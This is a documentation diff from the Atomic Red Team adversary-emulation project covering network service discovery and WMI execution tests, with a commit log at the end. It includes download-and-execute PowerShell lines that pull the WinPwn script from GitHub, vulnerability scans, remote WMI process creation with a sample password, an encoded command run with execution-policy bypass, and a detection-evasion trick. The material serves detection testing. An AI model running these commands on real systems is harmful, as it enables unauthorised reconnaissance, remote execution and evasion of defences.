+**auto_generated_guid:** `d696a3cb-d7a8-4976-8eb5-5af4abf2e3df`

-**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
 | host_to_scan | The host to scan with NMap | string | 127.0.0.1|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 nmap #{host_to_scan}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: NMap must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" #{nmap_url}
 Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S
 ```

+### Atomic Test #4: Port Scan using python

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Port Scan using python
 Scan ports to check for listening ports with python

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6ca45b04-9f15-4424-b9d3-84a217285a5c`

-**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_ip | Host to scan. | string | 127.0.0.1|
 | filename | Location of the project file | path | PathToAtomicsFolder&#92;T1046&#92;src&#92;T1046.py|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 python "#{filename}" -i #{host_ip}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Check if python exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```

+### Atomic Test #5: WinPwn - spoolvulnscan

-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - WinPwn - spoolvulnscan
 Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn

 **Supported Platforms:** Windows

+**auto_generated_guid:** `54574908-f1de-4356-9021-8053dd57439a`

-**auto_generated_guid:** 54574908-f1de-4356-9021-8053dd57439a
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 spoolvulnscan -noninteractive -consoleoutput
 ```

+### Atomic Test #6: WinPwn - MS17-10

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - WinPwn - MS17-10
 Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn

 **Supported Platforms:** Windows

+**auto_generated_guid:** `97585b04-5be2-40e9-8c31-82157b8af2d6`

-**auto_generated_guid:** 97585b04-5be2-40e9-8c31-82157b8af2d6
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 MS17-10 -noninteractive -consoleoutput
 ```

+### Atomic Test #7: WinPwn - bluekeep

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - WinPwn - bluekeep
 Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).

 **Supported Platforms:** Windows

+**auto_generated_guid:** `1cca5640-32a9-46e6-b8e0-fabbe2384a73`

-**auto_generated_guid:** 1cca5640-32a9-46e6-b8e0-fabbe2384a73
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 bluekeep -noninteractive -consoleoutput
 ```

+### Atomic Test #8: WinPwn - fruit

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - WinPwn - fruit
 Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn

 **Supported Platforms:** Windows

+**auto_generated_guid:** `bb037826-cbe8-4a41-93ea-b94059d6bb98`

-**auto_generated_guid:** bb037826-cbe8-4a41-93ea-b94059d6bb98
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 fruit -noninteractive -consoleoutput
 ```

+### Atomic Test #9: Network Service Discovery for Containers

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Network Service Discovery for Containers
 Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.

 **Supported Platforms:** Containers

+**auto_generated_guid:** `06eaafdb-8982-426e-8a31-d572da633caa`

-**auto_generated_guid:** 06eaafdb-8982-426e-8a31-d572da633caa
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 docker build -t t1046 $PathToAtomicsFolder/T1046/src/
@@ -376,63 +273,61 @@ docker run --name t1046_container --rm -d -t t1046
 docker exec t1046_container /scan.sh
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 docker stop t1046_container
 docker rmi -f t1046
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Verify docker is installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 which docker
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
 ```
+
 ##### Description: Verify docker service is running.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 sudo systemctl status docker  --no-pager
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 sudo systemctl start docker
 ```

+### Atomic Test #10: Port-Scanning /24 Subnet with PowerShell

-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Port-Scanning /24 Subnet with PowerShell
 Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
 The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `05df2a79-dba6-4088-a804-9ca0802ca8e4`

-**auto_generated_guid:** 05df2a79-dba6-4088-a804-9ca0802ca8e4
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots) | string | |
 | port_list | Comma separated list of ports to scan | string | 445, 3389|
 | timeout_ms | Connection timeout in milliseconds | string | 200|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $ipAddr = "#{ip_address}"
@@ -489,83 +384,55 @@ if ($ipAddr -like "*,*") {
 }
 ```

+### Atomic Test #11: Remote Desktop Services Discovery via PowerShell

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Remote Desktop Services Discovery via PowerShell
 Availability of remote desktop services can be checked using get- cmdlet of PowerShell

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9e55750e-4cbf-4013-9627-e9a045b541bf`

-**auto_generated_guid:** 9e55750e-4cbf-4013-9627-e9a045b541bf
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
 ```

+### Atomic Test #12: Port Scan using nmap (Port range)

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - Port Scan using nmap (Port range)
 Scan multiple ports to check for listening ports with nmap

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `0d5a2b03-3a26-45e4-96ae-89485b4d1f97`

-**auto_generated_guid:** 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host | Host(s) to scan. | string | 127.0.0.1|
 | port_range | Port range(s) to scan. | string | 0-65535|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 nmap -Pn -sV -p #{port_range} #{host}
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if nmap command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
 ```

-
-
-
-<br/>
@@ -1,130 +1,77 @@
 # T1047 - Windows Management Instrumentation
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1047)
-<blockquote>

-Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
+## Description from ATT&CK

-The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
+> Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
+> 
+> The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
+> 
+> An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
+> 
+> **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)

-An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
-
-**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1047)

 ## Atomic Tests

- [Atomic Test #1 - WMI Reconnaissance Users](#atomic-test-1---wmi-reconnaissance-users)
+- [Atomic Test #1: WMI Reconnaissance Users](#atomic-test-1-wmi-reconnaissance-users)
+- [Atomic Test #2: WMI Reconnaissance Processes](#atomic-test-2-wmi-reconnaissance-processes)
+- [Atomic Test #3: WMI Reconnaissance Software](#atomic-test-3-wmi-reconnaissance-software)
+- [Atomic Test #4: WMI Reconnaissance List Remote Services](#atomic-test-4-wmi-reconnaissance-list-remote-services)
+- [Atomic Test #5: WMI Execute Local Process](#atomic-test-5-wmi-execute-local-process)
+- [Atomic Test #6: WMI Execute Remote Process](#atomic-test-6-wmi-execute-remote-process)
+- [Atomic Test #7: Create a Process using WMI Query and an Encoded Command](#atomic-test-7-create-a-process-using-wmi-query-and-an-encoded-command)
+- [Atomic Test #8: Create a Process using obfuscated Win32_Process](#atomic-test-8-create-a-process-using-obfuscated-win32_process)
+- [Atomic Test #9: WMI Execute rundll32](#atomic-test-9-wmi-execute-rundll32)
+- [Atomic Test #10: Application uninstall using WMIC](#atomic-test-10-application-uninstall-using-wmic)

- [Atomic Test #2 - WMI Reconnaissance Processes](#atomic-test-2---wmi-reconnaissance-processes)
+### Atomic Test #1: WMI Reconnaissance Users

- [Atomic Test #3 - WMI Reconnaissance Software](#atomic-test-3---wmi-reconnaissance-software)
-
- [Atomic Test #4 - WMI Reconnaissance List Remote Services](#atomic-test-4---wmi-reconnaissance-list-remote-services)
-
- [Atomic Test #5 - WMI Execute Local Process](#atomic-test-5---wmi-execute-local-process)
-
- [Atomic Test #6 - WMI Execute Remote Process](#atomic-test-6---wmi-execute-remote-process)
-
- [Atomic Test #7 - Create a Process using WMI Query and an Encoded Command](#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command)
-
- [Atomic Test #8 - Create a Process using obfuscated Win32_Process](#atomic-test-8---create-a-process-using-obfuscated-win32_process)
-
- [Atomic Test #9 - WMI Execute rundll32](#atomic-test-9---wmi-execute-rundll32)
-
- [Atomic Test #10 - Application uninstall using WMIC](#atomic-test-10---application-uninstall-using-wmic)
-
-
-<br/>
-
-## Atomic Test #1 - WMI Reconnaissance Users
 An adversary might use WMI to list all local User Accounts. 
 When the test completes , there should be local user accounts information displayed on the command line.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c107778c-dcf5-47c5-af2e-1d058a3df3ea`

-**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic useraccount get /ALL /format:csv
 ```

+### Atomic Test #2: WMI Reconnaissance Processes

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - WMI Reconnaissance Processes
 An adversary might use WMI to list Processes running on the compromised host.
 When the test completes , there should be running processes listed on the command line.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5750aa16-0e59-4410-8b9a-8a47ca2788e2`

-**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic process get caption,executablepath,commandline /format:csv
 ```

+### Atomic Test #3: WMI Reconnaissance Software

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - WMI Reconnaissance Software
 An adversary might use WMI to list installed Software hotfix and patches.
 When the test completes, there should be a list of installed patches and when they were installed.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `718aebaa-d0e0-471a-8241-c5afa69c7414`

-**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic qfe get description,installedOn /format:csv
 ```

+### Atomic Test #4: WMI Reconnaissance List Remote Services

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - WMI Reconnaissance List Remote Services
 An adversary might use WMI to check if a certain Remote Service is running on a remote device. 
 When the test completes, a service information will be displayed on the screen if it exists.
 A common feedback message is that "No instance(s) Available" if the service queried is not running.
@@ -133,88 +80,59 @@ if the provided remote host is unreachable

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0fd48ef7-d890-4e93-a533-f7dedd5191d3`

-**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | string | 127.0.0.1|
 | service_search_string | Name Of Service | string | Spooler|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
 ```

+### Atomic Test #5: WMI Execute Local Process

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - WMI Execute Local Process
 This test uses wmic.exe to execute a process on the local host.
 When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3`

-**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_to_execute | Name or path of process to execute. | string | notepad.exe|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic process call create #{process_to_execute}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 wmic process where name='#{process_to_execute}' delete >nul 2>&1
 ```
+### Atomic Test #6: WMI Execute Remote Process

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - WMI Execute Remote Process
 This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
 To clean up, provide the same node input as the one provided to run the test
 A common error message is "Node - (provided IP or default)  ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9c8ef159-c666-472f-9874-90c8d60d136b`

-**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | string | 127.0.0.1|
@@ -222,27 +140,19 @@ A common error message is "Node - (provided IP or default)  ERROR Description =T
 | password | Password | string | P@ssw0rd1|
 | process_to_execute | Name or path of process to execute. | string | notepad.exe|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
 ```
+### Atomic Test #7: Create a Process using WMI Query and an Encoded Command

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command
 Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
 Powershell -nop -exec bypass -EncodedCommand <encoded command>
 Where the –EncodedCommand, once decoded, would resemble:
@@ -253,51 +163,31 @@ You should expect to see notepad.exe running after execution of this test.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `7db7a7f9-9531-4840-9b30-46220135441c`

-**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
 ```

+### Atomic Test #8: Create a Process using obfuscated Win32_Process

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Create a Process using obfuscated Win32_Process
 This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
 [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `10447c83-fc38-462a-a936-5102363b1c43`

-**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | new_class | Derived class name | string | Win32_Atomic|
 | process_to_execute | Name or path of process to execute. | string | notepad.exe|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 $Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
@@ -306,111 +196,96 @@ $NewClass.Put()
 Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 $CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
 try { $CleanupClass.Delete() } catch {}
 ```
+### Atomic Test #9: WMI Execute rundll32

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - WMI Execute rundll32
 This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `00738d2a-4651-4d76-adf2-c43a41dfb243`

-**auto_generated_guid:** 00738d2a-4651-4d76-adf2-c43a41dfb243
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Ip Address | string | 127.0.0.1|
 | dll_to_execute | Path to DLL. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;calc.dll|
 | function_to_execute | Name of DLL function to call | string | StartW|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 taskkill /f /im calculator.exe
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
 ```

+### Atomic Test #10: Application uninstall using WMIC

-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Application uninstall using WMIC
 Emulates uninstalling  applications using WMIC.  This method only works if the product was installed with an msi file.  APTs have been seen using this to uninstall security products.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `c510d25b-1667-467d-8331-a56d3e9bc4ff`

-**auto_generated_guid:** c510d25b-1667-467d-8331-a56d3e9bc4ff
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | node | Computer the action is being executed against but defaults to the localhost. | string | 127.0.0.1|
 | product | Enter the product name being uninstalled.  This will default to TightVNC. | string | Tightvnc|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: TightVNC must be installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
 start-sleep -s 10
@@ -418,7 +293,3 @@ msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /
 start-sleep -s 15
 ```

-
-
-
-<br/>
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Hare Sudhan	741712ef1d	fix attack navigator version	2026-03-23 22:15:22 -04:00
Atomic Red Team doc generator	40a54bf631	Generated docs from job=generate-docs branch=master [ci skip]	2026-03-24 01:58:10 +00:00
alexw07777	2356c60c26	Fix T1003.006 Test #2 prereq_command: incorrect ExportedCommands key (#3297 ) Co-authored-by: kali <kali@kali-hp.kali> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>	2026-03-23 21:57:11 -04:00
Atomic Red Team doc generator	9afe9e4bbf	Generated docs from job=generate-docs branch=master [ci skip]	2026-03-24 01:50:28 +00:00
pyth0n1c	468848cb1e	Remove extra field "description" in executor OR update models.py schema (#3298 ) Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>	2026-03-23 21:49:16 -04:00
Atomic Red Team doc generator	962983c3ac	Generated docs from job=generate-docs branch=master [ci skip]	2026-03-18 05:07:16 +00:00
Vladan Sekulic	f2268cc35e	Enhance T1027/T1027.013 obfuscation tests: character array & password-protected ZIP (#3279 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-03-18 10:36:21 +05:30
Atomic Red Team doc generator	7a0e342323	Generated docs from job=generate-docs branch=master [ci skip]	2026-03-13 11:19:52 +00:00
zendannyy	7b3bc23307	New Test for AWS Config (#3278 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2026-03-13 16:48:26 +05:30
dependabot[bot]	d754ba322f	Bump typer from 0.23.1 to 0.24.1 (#3292 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2026-03-10 09:13:44 -04:00
dependabot[bot]	a80f3a7874	Bump actions/upload-artifact from 6 to 7 (#3294 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2026-03-10 09:12:10 -04:00
dependabot[bot]	014ec22bc8	Bump hashicorp/setup-terraform from 3 to 4 (#3295 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2026-03-10 09:08:52 -04:00
